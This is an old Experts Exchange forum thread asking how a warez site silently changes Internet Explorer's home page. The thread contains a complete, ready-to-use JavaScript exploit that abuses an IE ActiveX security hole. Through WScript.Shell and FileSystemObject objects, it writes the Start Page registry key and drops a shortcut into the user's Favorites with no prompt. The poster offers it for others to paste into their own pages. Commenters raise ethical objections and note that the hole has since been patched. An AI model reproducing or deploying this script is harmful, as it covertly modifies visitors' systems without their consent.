Solved

Set home page without prompt?

Posted on 2001-07-07
10
244 Views
Last Modified: 2012-05-04
I noticed, that page www.easywarez.com sets default home page in MS Internet Explorer without that familiar "Would you like to set your home page..." prompt. I checked their sources but I was not able to find out how they do it.

Could someone please tell me how this is done?

0
Comment
Question by:jakac
10 Comments
 
LVL 5

Expert Comment

by:djbusychild
Comment Utility
what ARE you doing at a site like that??? --;

No there's no way of doing that without prompting unless you have downloaded an activex control from them or you're running their ste on HTA.

I just went to the site and they do prompt me for setting their page as my home.
0
 

Expert Comment

by:dfc106
Comment Utility
They prompted me too, but the homepage had already been set by then.  And I hadn't downloaded any activeX components.  Added a bookmark too.  Can't figure out how they did the homepage though.
0
 
LVL 5

Expert Comment

by:djbusychild
Comment Utility
well, it didn't work for me. My homepage is still intact. mayeb your computer has been had. ;)
0
 
LVL 7

Expert Comment

by:daniel_c
Comment Utility
It didn't work for me either... :)
It still prompted me, and asked for permission to set as my homepage.
0
 
LVL 6

Accepted Solution

by:
gete earned 100 total points
Comment Utility
The page heavily uses Microsoft technology so it will only work for IE. It exploits some of security holes that IE had, that's why maybe it won't work for people regularly update their system. Basically what it does is creating a Windows Script Shell ActiveX object (which is should be marked unsafe I think) in the client-side script, and then using that object, it will modify your registry (the current user/HKCU) where your default page setting resides. And then it also create a File System Object to add a link file directly into your Favorites folder.

In that website, the code is called from the left frame's page using external encoded .js file. You can download the .js by typing directly in the URL bar and try to find the Windows Scripting decoder floating around in the net.

Note: this method is considered a security hole exploitation, so actually it wouldn't be nice to do those things to your visitors.
0
Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

 
LVL 1

Author Comment

by:jakac
Comment Utility
OK I did everything gete told me to do and now I perfectly understand how it is done...
Here's the whole script if anyone wants to have it. Just save following into something.js and call it from your html with <script language="JavaScript" src="something.js"></script>
This script will set user's default homepage and it will add your page to favorites. This script was tested and works for IE 5 and also IE 6 preview.


---

     document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

     if (navigator.appName == 'Netscape') var language = navigator.language;
     else var language = navigator.browserLanguage;

     function AddFavLnk(loc, DispName, SiteURL) {
       var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
       Shor.TargetPath = SiteURL;
       Shor.Save();
     }

     function f() {
       try {
      a1=document.applets[0];
      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Shl = a1.GetObject();
      a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
      a1.createInstance();
      FSO = a1.GetObject();
      a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Net = a1.GetObject();
      try {
          if (!language.indexOf('es') >-1) Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.yourpage.com/");
// this will set user your page as a default homepage

          var WF, Shor, loc;
          WF = FSO.GetSpecialFolder(0);
          if (language.indexOf('es') >-1) loc = WF + "\\favoritos";
          else if (language.indexOf('de') >-1) loc = WF + "\\favoriten";
          else if (language.indexOf('sv') >-1) loc = WF + "\\favoriter";
          else if (language.indexOf('it') >-1) loc = WF + "\\preferiti";
          else if (language.indexOf('fr') >-1) loc = WF + "\\favoris";
          else if (language.indexOf('da') >-1) loc = WF + "\\oversigt";
          else loc = WF + "\\Favorites";
          if(!FSO.FolderExists(loc)) {
            if (language.indexOf('es') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favoritos";
            else if (language.indexOf('de') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriten";
            else if (language.indexOf('sv') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriter";
            else if (language.indexOf('it') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\preferiti";
            else if (language.indexOf('fr') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoris";
            else if (language.indexOf('da') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\oversigt";
            else loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
            if(!FSO.FolderExists(loc)) {
              return;
            }
          }
          AddFavLnk(loc, "title of your homepage", "http://www.urlofyourpage.com/");
// this will add your page to users favorites

      }
      catch(e) {}
       }
       catch(e) {}
     }

     function init() {
       setTimeout("f()", 1000);
     }

     init();

---
0
 
LVL 6

Expert Comment

by:gete
Comment Utility
Ahem, actually I didn't expect the whole thing to be posted in this open forum since it's using one of IE security hole. I hope everyone sees it is able to see the methods just for the sake of learning and wisely not putting that to 'forcely' advertise our site.

Anyway, I think the matter is clear now, and since imho I'm the closest one to give the direction, I don't mind if you decided to delete this question because it's quite a sensitive issue ;) But if you think the otherwise to put it in the PAQ, I don't mind either since this is also a learning media, we learn together.

Keep up the good discussion spirit..
0
 
LVL 5

Expert Comment

by:djbusychild
Comment Utility
why would anybody want to use this exploit?
0
 

Expert Comment

by:bcdeveloper
Comment Utility
I am trying to use this as a means of setting the homepage on 500 computers on our company intranet.

everyone is or will be using at least IE 5.0, no netscape users.  

However, I am having trouble getting this to work.  

Gete did you write this? Might you be willing to contact me about how to set it up.  

I can be reached at kenneth.ketsdever@smfbc.org
0
 
LVL 75

Expert Comment

by:Michel Plungjan
Comment Utility
Did you try the policy editor from Microsoft ???

Ps: this exploit has been closed or at least is alerting warnings
0

Featured Post

IT, Stop Being Called Into Every Meeting

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

Having worked on larger scale sites, we found out that you are bound to look at more scalable solutions to integrating widgets, code snippets or complete applications and mesh them into functional sites, in any given composition. To share some of…
Nothing in an HTTP request can be trusted, including HTTP headers and form data.  A form token is a tool that can be used to guard against request forgeries (CSRF).  This article shows an improved approach to form tokens, making it more difficult to…
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now